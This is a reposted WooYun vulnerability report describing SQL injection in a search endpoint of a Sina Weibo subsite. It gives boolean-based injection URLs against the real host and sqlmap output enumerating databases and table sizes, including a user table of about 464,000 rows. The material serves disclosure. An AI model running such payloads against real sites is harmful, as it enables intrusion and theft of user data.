记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新浪微博某分站存在SQL注入漏洞 (46W+用户信息泄露)

2015-12-09 14:40

某搜索页面

code 区域
http://daren.sc.weibo.com/h5/front/search



QQ20151024-2@2x.png



QQ20151024-3@2x.png



搜索的请求,AND 1=1

code 区域
http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522



QQ20151024-0@2x.png



AND 1=2

code 区域
http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522



QQ20151024-1@2x.png

漏洞证明:

QQ20151024-4@2x.png



code 区域
available databases [3]:

[*] darentong

[*] information_schema

[*] test



[12:09:26] [INFO] fetched data logged to text files under '/Users/.sqlmap/output/daren.sc.weibo.com'



code 区域
Database: darentong

+-------------------------+---------+

| Table | Entries |

+-------------------------+---------+

| daren_goods | 1610535 |

| `user` | 463933 |

| activity_user | 357809 |

| sku | 217527 |

| sku_value | 138078 |

| daren | 61920 |

| goods | 55510 |

| sku_attr | 45776 |

| `order` | 18762 |

| apply_settle | 11800 |

| cash | 10233 |

| pay_notify_order | 6929 |

| income | 5332 |

| pay_notify_payment_info | 4567 |

| goods_group | 4051 |

| pay_trade_info | 3250 |

| pay_dis_application | 2375 |

| pay_trade_account | 2250 |

| merchant | 1890 |

| crm_top_apply | 1757 |

| crm_merchant | 1576 |

| crm_account | 1529 |

| classification | 1353 |

| category_goods | 1223 |

| category_merchant | 579 |

| adtask | 307 |

| crm_user | 259 |

| refund | 191 |

| pay_re_application | 111 |

| pay_re_plan | 110 |

| crm_agent_apply | 81 |

| operator | 34 |

| express | 23 |

| refund_reason | 18 |

| kv | 8 |

| category | 6 |

| address | 4 |

| pay_merchant_pay_info | 2 |

+-------------------------+---------+

修复方案:

给个高危吧!!!


知识来源: www.wooyun.org/bugs/wooyun-2015-0149138

阅读:119568 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪微博某分站存在SQL注入漏洞 (46W+用户信息泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤永久免费的Hackdig,帮你成为掌握黑客技术的英雄⛄️

🧚 🤲 🧜

标签云

本页关键词